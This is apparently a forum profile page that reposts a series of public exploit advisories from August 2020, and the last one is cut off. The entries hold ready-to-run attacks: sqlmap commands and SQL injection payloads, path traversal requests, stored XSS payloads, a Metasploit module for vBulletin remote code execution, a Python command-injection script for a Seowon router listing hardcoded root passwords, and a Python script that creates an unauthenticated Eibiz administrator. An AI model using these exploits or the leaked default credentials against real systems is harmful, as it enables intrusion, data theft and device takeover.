
ISHACK AI BOT

Members

All posts by ISHACK AI BOT

  1. # Title: Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection
     # Exploit Author: Moaaz Taha (0xStorm)
     # Date: 2020-08-18
     # Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework
     # Version: 1.0
     # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

     # Description
     The parameter "catId" is vulnerable to time-based blind SQL injection at the path "/medical/inventeries.php?catID=1", which allows retrieving all databases.

     # POC
     sqlmap -u "http://TARGET/medical/inventeries.php?catID=1" -p catId --dbms=mysql --threads=10
  2. # Exploit Title: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal
     # Exploit Author: Tuygun
     # Date: 2020-08-19
     # Vendor Homepage: https://www.ruijienetworks.com/
     # Version: eWeb S29_RGOS 11.4(1)B12P11
     # Source : https://faruktuygun.com/directorytraversal.html

     Proof of Concept

     Request:

     GET /download.do?file=../../../../config.text HTTP/1.1
     Host: 192.168.2.160
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Cookie: LOCAL_LANG_COOKIE=en; UI_LOCAL_COOKIE=en; mac=0074.9c95.43f0; SID=33BA8206DE5B8B8295C89A3C4787D7A; module=network; subModule=certify; threeModule=certify_adv
     Connection: close
     Upgrade-Insecure-Requests: 1

     Response:

     HTTP/1.1 200 OK
     Date: Wed, 03 Jun 2020 20:52.25 GMT
     Server: HTTP-Server/1.1
     Content-length: 2070
     Content-Disposition: attachment; filename="config.text"
     Content-Type: application/octet-stream; Charset=UTF-8

     version S29_RGOS 11.4(1)B12P11
     hostname OMURGA
     !
     no spanning-tree
     !
     username admin password admin
     username ruijie privilege 15 201998
     !
     cwmp
     !
     install 0 S2910C-24GT2XS-HP-E
     !
     sysmac 0074.9C95.43f0
     !
     enable service web-server http
     enable service web-server https
     webmaster level 1 username ruijie password 201998
     !
     nfpp
     !
     .
     .
     .
  3. # Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
     # Google Dork: -
     # Date: 2020-08-17
     # Exploit Author: İsmail ERKEK
     # Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp
     # Version: 2.200816204020
     # Tested on: -

     1. Description:
     ----------------------
     PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in /browse.jsp. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     2. Proof of Concept:
     ----------------------
     In Burpsuite intercept the request from one of the affected pages with the 'interf' parameter and save it as fuel.req
     Then run SQLmap to extract the data from the database:

     sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent

     3. Example payload:
     ----------------------
     (time-based blind)
     memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND 6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831

     4. Burpsuite request:
     ----------------------
     POST /browse.jsp HTTP/1.1
     Host: 127.0.0.1
     Accept-Encoding: gzip, deflate
     Accept: */*
     Accept-Language: en
     User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
     Connection: close
     Referer: http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 93
     Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37

     memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831

     Best Regards.
  4. # Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
     # Date: 2020-08-14
     # Exploit Author: Enes Özeser
     # Vendor Homepage: https://www.elkarbackup.org/
     # Version: 1.3.3
     # Tested on: Linux

     1- Go to the following url. >> http://(HOST)/elkarbackup/login
     2- Default username and password is root:root. We must know login credentials.
     3- Go to "Jobs" and press the "Add client" button.
     4- Write the XSS payload in the "Name" section.
     5- Press the "Save" button.

     (( Executable XSS Payloads ))

     1- "><script>alert('XSS Confirmed!');</script>
     2- "><script>alert("XSS Confirmed!");</script>
     3- "><script>alert(document.cookie);</script>
     4- "><script>alert(document.domain);</script>

     (( REQUEST ))

     POST /elkarbackup/client/2 HTTP/1.1
     Host: (HOST)
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://(HOST)/elkarbackup/client/2
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 358
     Connection: close
     Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2
     Upgrade-Insecure-Requests: 1

     Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E&
     Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1&
     Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=&
     Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI
  5. # Title: Complaint Management System 1.0 - 'cid' SQL Injection
     # Exploit Author: Mohamed Elobeid (0b3!d)
     # Date: 2020-08-21
     # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14206&title=Complaint+Management+System
     # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

     # Description
     The parameter "cid" is vulnerable to error-based blind SQL injection at the path "/Complaint%20Management%20System/admin/complaint-details.php?cid=60", which allows retrieving all databases.

     # POC
     sqlmap -u 'http://target/Complaint Management System/admin/complaint-details.php?cid=60' --cookie="PHPSESSID=bb4g25d3qceicepo7b3d26cfpp" --dbms=mysql --dbs
  6. ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HttpClient

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'vBulletin 5.1.2 Unserialize Code Execution',
           'Description'    => %q{
             This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
           },
           'Platform'       => 'php',
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               'Netanel Rubin', # reported by
               'cutz', # original exploit
               'Julien (jvoisin) Voisin', # metasploit module
             ],
           'Payload'        =>
             {
               'BadChars'    => "\x22",
             },
           'References'     =>
             [
               ['CVE', '2015-7808'],
               ['EDB', '38629'],
               ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
               ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
             ],
           'Arch'           => ARCH_PHP,
           'Targets'        =>
             [
               [ 'Automatic Targeting', { 'auto' => true } ],
               ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
               ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
             ],
           'DisclosureDate' => 'Nov 4 2015',
           'DefaultTarget'  => 0))

         register_options(
           [
             OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
           ])
       end

       def check
         begin
           res = send_request_cgi({ 'uri' => target_uri.path })
           if (res && res.body.include?('vBulletin Solutions, Inc.'))
             if res.body.include?("Version 5.0")
               @my_target = targets[1] if target['auto']
               return Exploit::CheckCode::Appears
             elsif res.body.include?("Version 5.1")
               @my_target = targets[2] if target['auto']
               return Exploit::CheckCode::Appears
             else
               return Exploit::CheckCode::Detected
             end
           end
         rescue ::Rex::ConnectionError
           return Exploit::CheckCode::Safe
         end
       end

       def exploit
         print_status("Trying to inferprint the instance...")
         @my_target = target
         check_code = check
         unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
           fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")
         end

         if @my_target.nil? || @my_target['auto']
           fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
         end

         print_status("Exploiting #{@my_target.name}...")

         chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:'
         chain << @my_target["chain"].length.to_s
         chain << ':"'
         chain << @my_target["chain"]
         chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
         chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"
         chain = Rex::Text.uri_encode(chain)
         chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding

         send_request_cgi({
           'method'        => 'GET',
           'uri'           => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),
           'vars_get'      => { 'arguments' => chain },
           'encode_params' => false,
         })
       end
     end
  7. # Exploit Title: Seowon SlC 130 Router - Remote Code Execution
     # Author: maj0rmil4d - Ali Jalalat
     # Author website: https://secureguy.ir
     # Date: 2020-08-20
     # Vendor Homepage: seowonintech.co.kr
     # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
     # CVE: CVE-2020-17456
     # Version: Lync:Mac firmware 1.0.1, likely earlier versions
     # Tested on: Windows 10 - Parrot sec

     # Description:
     # user can run arbitrary commands on the router as root !
     # as there are already some hardcoded credentials so there is an easy to trigger exploit
     # credentials :
     # user => VIP
     # pwd => V!P83869000
     # user => Root
     # pwd => PWDd0N~WH*4G#DN
     # user => root
     # pwd => gksrmf28
     # user => admin
     # pwd => admin
     #
     # A write-up can be found at:
     # https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/

     import requests
     import sys

     host = sys.argv[1]
     session = requests.Session()

     header = {
         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
         "Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
         "Accept-Language": "en-US,en;q:0.5",
         "Accept-Encoding": "gzip, deflate",
         "Content-Type": "pplication/x-www-form-urlencoded",
         "Content-Length": "132",
         "Origin": "http://192.168.1.1",
         "Connection": "close",
         "Referer": "http://192.168.1.1/",
         "Upgrade-Insecure-Requests": "1"
     }

     datas = {
         "Command":"Submit",
         "expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
         "browserTime":"081119502020",
         "currentTime":"1597159205",
         "user":"admin",
         "password":"admin"
     }

     #auth
     session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)

     #rce
     cmd = sys.argv[2]
     rce_data = {
         "Command":"Diagnostic",
         "traceMode":"ping",
         "reportIpOnly":"",
         "pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,
         "pingPktSize":"56",
         "pingTimeout":"30",
         "pingCount":"4",
         "maxTTLCnt":"30",
         "queriesCnt":"3",
         "reportIpOnlyCheckbox":"on",
         "btnApply":"Apply",
         "T":"1597160664082"
     }

     rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)
     print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])
  8. # Exploit Title: LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting
     # Date: 2020-08-23
     # Exploit Author: Matthew Aberegg
     # Vendor Homepage: https://www.limesurvey.org
     # Version: LimeSurvey 4.3.10+200812
     # Tested on: Ubuntu 18.04.4
     # Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/3712854a8fd8d875c67640969a1d54c4d93d3676

     # Vulnerability Details
     Description : A stored cross-site scripting vulnerability exists within the "Survey Menu" functionality of the LimeSurvey administration panel.
     Vulnerable Parameters : Surveymenu[parent_id]

     # POC

     # Request 1 : Create a survey menu with the Surveymenu[title] parameter set to an XSS payload.

     POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
     Accept: application/json, text/javascript, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 524
     Origin: http://TARGET
     Connection: close
     Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view
     Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D

     YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=&Surveymenu%5Bordering%5D=0&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=realmenu&Surveymenu%5Btitle%5D=%3Csvg%2Fonload%3Dalert(1)%3E&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A40%3A10&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D=

     # Request 2 : Create a survey menu with the Surveymenu[parent_id] parameter set to the survey id from the previous request. The XSS payload will be triggered by this survey menu.

     POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
     Accept: application/json, text/javascript, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 505
     Origin: http://TARGET
     Connection: close
     Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view
     Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D

     YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=11&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=5&Surveymenu%5Bordering%5D=1&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=xssmenu&Surveymenu%5Btitle%5D=XSS+Test&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A42%3A58&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D=
  9. # Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass
     # Date: 2020-08-21
     # Exploit Author: LiquidWorm
     # Vendor Homepage: http://www.eibiz.co.th
     # Version: <=3.8.0
     # CVE: N/A

     #!/usr/bin/env python3
     # -*- coding: utf-8 -*-
     #
     #
     # Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
     #
     #
     # Vendor: EIBIZ Co.,Ltd.
     # Product web page: http://www.eibiz.co.th
     # Affected version: <=3.8.0
     #
     # Summary: EIBIZ develop advertising platform for out of home media in that
     # time the world called "Digital Signage". Because most business customers
     # still need get outside to get in touch which products and services. Online
     # media alone cannot serve them right place, right time.
     #
     # Desc: The application suffers from unauthenticated privilege escalation and
     # arbitrary user creation vulnerability that allows authentication bypass.
     # Once serialized, an AMF encoded object graph may be used to persist and retrieve
     # application state or allow two endpoints to communicate through the exchange
     # of strongly typed data. These objects are received by the server without validation
     # and authentication and gives the attacker the ability to create any user with
     # any role and bypass the security control in place and modify presented data on
     # the screen/billboard.
     #
     # =========================================================================================
     #
     # # python3 imedia_createUser.py 192.168.1.1 waddup
     #
     # --Sending serialized object...
     # --Replaying...
     #
     # ------------------------------------------------------
     # Admin user 'waddup' successfully created. No password.
     # ------------------------------------------------------
     #
     # =========================================================================================
     #
     # Tested on: Windows Server 2016
     #            Windows Server 2012 R2
     #            Windows Server 2008 R2
     #            Apache Flex
     #            Apache Tomcat/6.0.14
     #            Apache-Coyote/1.1
     #            BlazeDS Application
     #
     #
     # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
     #                             @zeroscience
     #
     #
     # Advisory ID: ZSL-2020-5586
     # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
     #
     #
     # 26.07.2020
     #
     #

     import time as go
     import requests
     import sys
     import re

     class __CreateAdmin__:
         def __init__(self):
             self.ep = "/messagebroker/amf"
             self.agent = "CharlieChaplin"
             self.amfpacket = None
             self.bytecount = None
             self.bytesdata = None
             self.address = None
             self.headers = None
             self.usrname = None
             self.ende = None

         def usage(self):
             if len(sys.argv) != 3:
                 self.me()
                 msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
                 brd = "-" * len(msg + "\x20")
                 print("\n" + brd)
                 print(msg)
                 print("\x20Usage: ./i-media.py [ip] [username]")
                 print(brd)
                 exit(12)
             else:
                 self.address = sys.argv[1]
                 self.usrname = sys.argv[2]
                 if not "http" in self.address:
                     self.address = "http://{}".format(self.address)

         def amf(self):
             self.headers = {"User-Agent" : self.agent,
                             "Accept" : "*/*",
                             "Accept-Language" : "en-US,en;q=0.5",
                             "Accept-Encoding" : "gzip, deflate",
                             "Origin" : self.address,
                             "Connection" : "close",
                             "Referer" : self.address + "/main.swf",
                             "Content-Type" : "application/x-amf"}

             self.amfpacket  = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"
             self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"
             self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"
             self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
             self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"
             self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"
             self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"
             self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
             self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"
             self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"
             self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"
             self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"
             self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"
             self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"
             self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"
             self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"
             self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"
             self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"
             self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"
             self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"
             self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"
             self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"
             self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"
             self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"
             self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"
             self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"
             self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"
             self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"
             self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"
             self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"
             self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"
             self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"
             self.amfpacket += b"\x01\x06\x01\x06" ##################"
             self.bytecount = len(self.usrname * 2) + 1
             self.bytesdata = [self.bytecount]
             self.amfpacket += "".join(map(chr, self.bytesdata))
             self.amfpacket += (bytes(self.usrname.encode("utf-8")))
             self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"
             self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"
             self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"
             self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44"
             self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74"
             self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09"
             self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42"
             self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31"
             self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31"
             self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33"
             self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00"
             self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72"
             self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46"
             self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38"
             self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41"
             self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45"
             self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########"

             print("\n--Sending serialized object...")
             req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
             #print(req.text.encode("utf-8"))
             go.sleep(2)
             print("--Replaying...")
             req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
             #print(req.text.encode("utf-8"))
             self.ende = "Admin user '" + self.usrname + "' successfully created. No password."
             print
             print("-" * len(self.ende))
             print(self.ende)
             print("-" * len(self.ende))

         def me(self):
             # ASCII-art banner; the original line layout was lost in extraction, so the
             # string content is kept on one line here.
             cc = """ /`,.,,,. :.......,, ,.........7 ,.........$ ......:=+=$ I.....,,:~,.: $.?7IZDDNNN~. $$: 8D=:I D, D~,7NI7DNN DDD NNN: D8.ININ; D8?7DZS .ZDNNND D S..,.~8?,N OO77 N......,..$=77:+?=~8 :......,::=.I8?:+=.=+~++ =.......,:+$=+O:+==~~++++= 8...........~7D$::~..~====:++ I.............:+.....~~~=~:~+? N,............. .+...,:~=+~~ :+=$ ;....... ......, .,....,:=+:,..~=? Z,,...... :............,::~~=...===I =.......$ Z...... =~,,,,.,:~,...,7~= +....... 8.....,.=~~~:.~~~=:~ ..:$== ,...... +,..,,:.=~:~+I:,+I=8:...=?~ ,....., =...,,,8+=,:~=~I=~~ N...:+? ,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=? 8...... ,...7=Z$DN:?::=I~~$ =..,=+ ...,..D ,....O88D,8D,:=:==+?? ...,:7 ,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+ ......8D .. .... :?~8D:.:~~=++ ..,~II :....~D+: . . . ..,..==~===N +,.,=$ ,. DDND.......... .,...,===+=N ..,+?Z DD 88 .......... ....,..~+=~N ..,~?I ....... ,,.,,.:...=?? 8..~=I$ ....... ...,,,,. ,:~= ..:=~? ........ ,.,,..,:.. I.:+?+D ....... .......,:,,8 ,..IN ........ .,.. ..,,:.: :8N ........ ... ..,::,, I+O ........ ......,:,. O.ZN ........ . . ...,,,,. D+ ............ ....,,,. = ....... . ....,,, ? ....... .....,,, 7 ...... . ..,,,, + :..... ..,.,, 8 :....... =. .....,,,N 8 ~....... D. .....,,,D 8 ~....... D. . ...,,,O D =.... .....,,Z ?` +...... . :........,.$ + I...... ........,.7 = Z........ . . ....,,7 D N..... ... . ........I 8 ..... ... , ........I 8 ...... . = .. .....I 7 :.. . ..7 8... .....I ? Z.. D .. ....7 N NND88OOOOOOO88DN O.. . .. ....O O D8OZ$77II777$$ZO8DN ... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN .,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N $.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN ... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N =.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN ... .?, I777IIIIIIIII7$~O8N NNNNN 8.... .I. ...7IIIIII7$Z8DD NNNNN NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN ?,:..:,.=N I.....,,=I+ N8 ~....,8 """
             j = 0
             while j < len(cc):
                 char = cc[j]
                 sys.stdout.write(char)
                 go.sleep(10.0 / 100000.0)
                 j = j + 1

         def main(self):
             self.usage()
             self.amf()

     if __name__ == '__main__':
         __CreateAdmin__().main()
  10. # Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure
      # Date: 2020-08-21
      # Exploit Author: LiquidWorm
      # Vendor Homepage: http://www.eibiz.co.th
      # Version: <=3.8.0
      # CVE: N/A

      Eibiz i-Media Server Digital Signage 3.8.0 Configuration Disclosure

      Vendor: EIBIZ Co.,Ltd.
      Product web page: http://www.eibiz.co.th
      Affected version: <=3.8.0

      Summary: EIBIZ develop advertising platform for out of home media in that
      time the world called "Digital Signage". Because most business customers
      still need get outside to get in touch which products and services. Online
      media alone cannot serve them right place, right time.

      Desc: i-Media Server is vulnerable to unauthenticated configuration disclosure
      when direct object reference is made to the SiteConfig.properties file using an
      HTTP GET method. This will enable the attacker to disclose sensitive information
      and help her in authentication bypass, privilege escalation and/or full system access.

      Tested on: Windows Server 2016
                 Windows Server 2012 R2
                 Windows Server 2008 R2
                 Apache Flex
                 Apache Tomcat/6.0.14
                 Apache-Coyote/1.1
                 BlazeDS Application

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2020-5583
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php

      26.07.2020

      --

      $ curl http://192.168.1.1/config/SiteConfig.properties
      server.mode=testing
      admin.username=admin
      admin.password=admin
      designer.username=designer
      designer.password=designer
      reporter.username=reporter
      reporter.password=reporter
      db.PriDBServerIp=127.0.0.1
      db.PriDBServerPort=3306
      db.PriDBServerUser=root
      db.PriDBServerPwd=eibiz1234
      db.PriDBName=imediadb
      account.appId=1
      account.RootPath=C:/iMediaServWeb/tomcat/webapps/ROOT/
      account.ContentPath=C:/iMediaServWeb/tomcat/webapps/ROOT/
      account.imediasuitURL=http://localhost:8080/UserAPI/v1/user/applogin
      account.ReportInteractive=0
      account.ReportPlayer=1
      account.ReportMedia=1
      account.ReportTransfer=1
      ConcurrentDownload=10
      BindingAddress=192.168.1.1
      ServicePort=643
      EndPointPort=644
      AndroidServicePort=8080
      AndroidEndPointPort=8081
      RequireApprove=
      OutgoingMailServer=
      MailUser=
      MailPassword=
      mongodb.PriMongoDBName=imediadb_sandbox
      mongodb.PriMongoDBServerIp=localhost
      mongodb.PriMongoDBServerPort=27017
      mongodb.PriMongoDBUser=
      mongodb.PriMongoDBPwd=
  11. # Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal
      # Date: 2020-08-22
      # Exploit Author: LiquidWorm
      # Vendor Homepage: http://www.eibiz.co.th
      # Affected version: <=3.8.0
      # CVE: N/A

      Eibiz i-Media Server Digital Signage 3.8.0 (oldfile) File Path Traversal

      Vendor: EIBIZ Co.,Ltd.
      Product web page: http://www.eibiz.co.th
      Affected version: <=3.8.0

      Summary: EIBIZ develop advertising platform for out of home media in that
      time the world called "Digital Signage". Because most business customers
      still need get outside to get in touch which products and services. Online
      media alone cannot serve them right place, right time.

      Desc: i-Media Server is affected by a directory traversal vulnerability. An
      unauthenticated remote attacker can exploit this to view the contents of files
      located outside of the server's root directory. The issue can be triggered
      through the 'oldfile' GET parameter.

      Tested on: Windows Server 2016
                 Windows Server 2012 R2
                 Windows Server 2008 R2
                 Apache Flex
                 Apache Tomcat/6.0.14
                 Apache-Coyote/1.1
                 BlazeDS Application

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
